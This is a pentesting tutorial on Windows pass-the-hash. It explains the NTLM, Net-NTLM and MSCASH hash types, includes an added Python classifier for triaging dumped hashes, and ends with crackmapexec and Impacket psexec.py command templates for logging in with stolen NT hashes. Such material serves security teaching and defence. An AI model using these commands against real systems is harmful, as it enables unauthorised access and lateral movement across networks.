Pass the hash

Before we get to the attack, let's clarify some terminology: NTLM vs. NTLMv1/v2 vs. Net-NTLMv1/v2 vs. MSCASHv1/v2. There is a lot of overlapping phrasing out there, and it can get confusing for people who are not used to working with these hashes.

NTLM ≠ (NTLMv1/v2 === Net-NTLMv1/v2) ≠ MSCASHv1/v2

In short:

  • NTLM (aka NT) hashes are local users' hashes

  • NTLMv1/v2 (aka Net-NTLMv1/v2) hashes are used for network authentication

  • MSCASHv1/v2 (aka DCCv1/v2) hashes are domain users' hashes

NTLM hashes are stored in the Security Account Manager (SAM) database and in the Domain Controller's NTDS.dit database. They look like this:

Contrary to what you'd expect, the LM hash is the one before the semicolon and the NT hash is the one after the semicolon. Starting with Windows Vista and Windows Server 2008, only the NT hash is stored by default. Net-NTLM hashes, on the other hand, are used for network authentication: they are the result of a challenge/response exchange and are derived from the user's NT hash. Here's an example of a Net-NTLMv2 (a.k.a. NTLMv2) hash:

admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030

From a pentesting perspective:

  • You CAN perform Pass-The-Hash attacks with NTLM hashes.

  • You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.
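The distinction drawn above (NT/LM:NT material is a password equivalent, Net-NTLMv1/v2 material is bound to a server challenge) is the one that matters when triaging a credential exposure: the first kind has to be rotated immediately, the second cannot be replayed as-is. The classifier below is an added example, not code from the original page, and assumes the hashcat/Responder-style field order for Net-NTLM strings (user::domain:challenge:proof:blob for v2, user::domain:lmresp:ntresp:challenge for v1); the sample dump lines are constructed placeholders except for the Net-NTLMv2 string quoted from this page.

```python
import re

# Hashes of the empty password. These are fixed values of the LM and NT algorithms;
# an LM field equal to EMPTY_LM means no LM hash is stored (the post-Vista default).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


def _hex(n):
    """Compile a regex matching exactly n hex characters."""
    return re.compile(rf"^[0-9a-fA-F]{{{n}}}$")


HEX16, HEX32, HEX48 = _hex(16), _hex(32), _hex(48)
HEXANY = re.compile(r"^[0-9a-fA-F]+$")


def classify_hash(line):
    """Identify the format of one credential string and whether it is a
    password-equivalent (NT hash) that pass-the-hash can reuse directly.

    Recognised layouts (hashcat/Responder-style field order, an assumption):
      NT            32 hex chars
      LM:NT         32 hex ':' 32 hex            (SAM / NTDS.dit dump line)
      Net-NTLMv2    user::domain:chal16:proof32:blobhex
      Net-NTLMv1    user::domain:lmresp48:ntresp48:chal16
    """
    s = line.strip()
    if HEX32.match(s):
        return {"format": "NT", "pth_usable": True, "nt": s.lower(),
                "empty_password": s.lower() == EMPTY_NT}

    parts = s.split(":")
    if len(parts) == 2 and all(HEX32.match(p) for p in parts):
        lm, nt = (p.lower() for p in parts)
        return {"format": "LM:NT", "pth_usable": True, "nt": nt,
                "lm_stored": lm != EMPTY_LM, "empty_password": nt == EMPTY_NT}

    if len(parts) == 6 and parts[1] == "":
        user, _, domain, a, b, c = parts
        # v2: 16-hex server challenge, 32-hex NTProofStr, variable-length blob
        if HEX16.match(a) and HEX32.match(b) and HEXANY.match(c):
            return {"format": "Net-NTLMv2", "pth_usable": False,
                    "user": user, "domain": domain, "server_challenge": a.lower()}
        # v1: 48-hex LM response, 48-hex NT response, 16-hex server challenge
        if HEX48.match(a) and HEX48.match(b) and HEX16.match(c):
            return {"format": "Net-NTLMv1", "pth_usable": False,
                    "user": user, "domain": domain, "server_challenge": c.lower()}

    return {"format": "unknown", "pth_usable": False}


def triage(lines):
    """Summarise a batch of lines: which ones are directly replayable and
    therefore need immediate password rotation, which are challenge-bound."""
    result = {"replayable": [], "challenge_bound": [], "unknown": []}
    for line in lines:
        info = classify_hash(line)
        if info["format"] == "unknown":
            result["unknown"].append(line)
        elif info["pth_usable"]:
            result["replayable"].append(line)
        else:
            result["challenge_bound"].append(line)
    return result


# Constructed sample input: an empty-LM/NT dump line, a bare (empty-password) NT
# hash, the Net-NTLMv2 string quoted on this page, and a junk line. The NT value
# on the first line is a placeholder, not a real account's hash.
SAMPLE = [
    "aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef",
    "31d6cfe0d16ae931b73c59d7e0c089c0",
    "admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:"
    "5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030",
    "this is not a hash",
]

if __name__ == "__main__":
    for line in SAMPLE:
        info = classify_hash(line)
        print(f"{info['format']:<11} pth_usable={info['pth_usable']!s:<5} {line[:40]}")
```

The `lm_stored` and `empty_password` fields are there because they change the response: an LM field other than the empty-password constant means a legacy LM hash is still being kept, and an NT hash equal to the empty-password constant means the account has no password at all, both of which deserve a finding of their own.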

Now on to the attack. To pass the hash you can still use crackmapexec:

crackmapexec <ip_range>/<CIDR> -u <user> -H <NT_hash> --local-auth

-H takes only the NT part of the hash, and --local-auth authenticates against the target's local SAM rather than the domain.

Other tools work too, such as Impacket's psexec.py:

psexec.py <user>:@<ip_addr> -hashes <LM_hash>:<NT_hash>

Here -hashes takes the whole LM:NT pair.
